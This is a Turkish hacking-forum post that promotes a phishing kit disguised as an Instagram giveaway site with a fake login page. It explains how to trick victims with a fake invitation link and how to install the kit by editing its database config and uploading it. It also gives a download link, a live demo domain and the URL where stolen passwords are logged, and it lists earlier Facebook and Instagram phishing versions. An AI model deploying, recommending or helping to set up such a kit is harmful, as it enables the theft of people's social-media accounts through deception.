Instagram Çalma Scripti! - Heisenberg Instagram Logger | (BSLogger Final Version)

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya
BS Logger Final Version
(Heisenberg Instagram Logger)

---Dikkat! Bu paragraf nostalji içermektedir ve konuyla alakası yoktur. Okumaya vakti olmayanlar, aşağıdan devam edebilir!---

Merhaba değerli TurkHackTeam üyeleri! İlk versiyonunu 2015'de yayınladığım BS Logger v1'den bu yana tam 5 sene geçmiş :) Şu an üniversiteye gidiyorum ve bunun ilk versiyonunu THT'de yayınladığımda henüz liseye bile geçmemiştim. Uzun bir zamandır foruma girmiyorum, ya da girersem de ayda 1-2 kez girip ne değişmiş diye bakıyorum. Benim zamanımda forumda olan çoğu kişi gitmiş ve bir sürü yeni arkadaş aramıza katılmış, yönetime girmiş. Heyy gidi günler. Şu an okuldan artakalan zamanlarımda yazılımla uğraşıyorum ve freelancer olarak developing'den para kazanıyorum. Ve şu an yabancı dillerle, bilgisayar donanımlarıyla, yazılım dilleriyle, grafiksel işlemlerle, front-end ile, back-end ile, database ile, internet of things ile, hacking ile, web secruity ile ve daha sayamayacağım kadar çok alanla ilgili bildiğim şeylerin hepsinin temelini bu forumdan öğrendim. Burası birçok insan ve benim için de, hiçbir zaman sadece bir forum olmadı. Hep aile gibiydi. Yani bir internet forumu insanın hayatını nasıl değiştirir sorusunun canlı örneğiyim. Çalıştığım alandan, hobilerime kadar her şeyi bu forumdaki insanlardan öğrendiklerimle belirledim ve gerçekten çok güzel ve çok özel insanlar tanıdım. Reel hayatımla ilgili bazı durumlardan ötürü foruma uzun zamandır fazla vakit ayıramamış olsam da, burası her zaman aklımda ve kalbimdeydi. Hepinizi çok seviyorum, iyi ki varsınız güzel insanlar! Bana çok şey öğrettiniz.

---Dikkat! Bu paragraf nostalji içermektedir ve konuyla alakası yoktur. Okumaya vakti olmayanlar, aşağıdan devam edebilir!---

Konuya dönecek olursak; Sistemin mantığı önceki versiyonların tümüyle aynı yani sosyal mühendislik temelli olarak çalışan bir scripttir. Çünkü Instagram gibi sosyal medya hesaplarını hacklemenin başka stabil bir yolu yoktur. BruteForce attack, kişisel bilgisayarların güçleri ile yapılmasını imkansız kılan, Remote Access Trojan ise bilgisayarlarda her ne kadar mükemmel çalışsa da, mobilde her zaman sıkıntı çıkaran yöntemlerdir. Özellikle iOS temelli cihazların kapalı kaynak koduna sahip olması nedeniyle (eğer jailbreak yapılmamışsa) hedefe ulaşacak bir virüs yazabilmeyi amatör programcılar veya deneyimsiz son kullancılar açısından imkansız kılacaktır.

Ancak sosyal mühendislik ile büyük bir yüzdeyle başarıya ulaşma şansınız vardır. Sosyal mühendisliğin ne olduğunu bildiğinizi varsaydığımdan ötürü bunu açıklamıyorum. Her neyse, script bir Instagram Çekiliş Sistemi görünümündedir. Son zamanlarda en sık kullanılan ağ olduğu için ve "abi instagram hesabı çalabilir misin eğvgev" gibi soruların çok dönmesinden dolayı bu sosyal medya ağını seçtim.

Bu scripti hedeflediğiniz kurbana nasıl yutturabileceğiniz de tamamen sizin hayal gücünüze kalmış ama ben olsam galiba davet linki gönderme taktiğini deneyebilirdim. Yani bence, scripti kurduğunuz domainin sonuna /# koyup uydurma bir davet linki url'sini karşı tarafa göndermek mantıklı olabilir ama dediğim gibi tamamen sizin hayal gücünüze kalmış. Eğer kullanmak isterseniz diye konunun sonuna bir davet linki bırakıyorum. Şimdi geçelim sitenin görünümüne:

Site Görüntüleri:

H25GnW.png

2yfqw0.png

fVljBI.png

Instagram Giriş Ekranı:

4RaOqo.png

Nasıl Kurulur?

Kurulum gayet basittir. Dosyaları aşağıda bıraktığım linkten indirip, config-one ve config-two dosyalarındaki database alanlarını kendi database bilgilerinizle değiştiriyorsunuz ve sunucunuza atıyorsunuz. Başka bir değişiklik yapmanıza gerek yok. Eğer bunlarla uğraşmak istemiyorsanız, aşağıya bıraktığım demoyu kullanabilirsiniz.

--------------------------------------------------------------------

İndirme adresi: https://www.dosya.tc/server26/mse7ed/heisenberg.rar.html
VirüsTotal: https://www.virustotal.com/gui/file...c8cb4a37eee240581639e2cfd04776754c0/detection

Demo adresi: Çekiliş Hediyem ile Kazanan Sen Ol!
Şifrelerin loglandığı adres: http://cekilishediyem.site/sifrelerburada.txt
Yukarda bahsi geçen, uydurma davet linki şeysi: cekilishediyem.site/#davetkodu?hl=tr&q=dk_15f5ap92bqr9

--------------------------------------------------------------------

Eski versiyonlar:

BS Logger V1 Yayında ! // 'Black-Sight
BST Facebook Hacker Yayında ! // (Bs Logger V2)
BS Instagram Hacker Yayında! / (BS Logger V3)
FakeFacebook V1 Yayında ! // 'Black-Sight
BS Facebook Liker // FakeFacebook V2 Yayında !

(eski versiyonlar, güncel değildir ve linkleri kırık olabilir.)

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.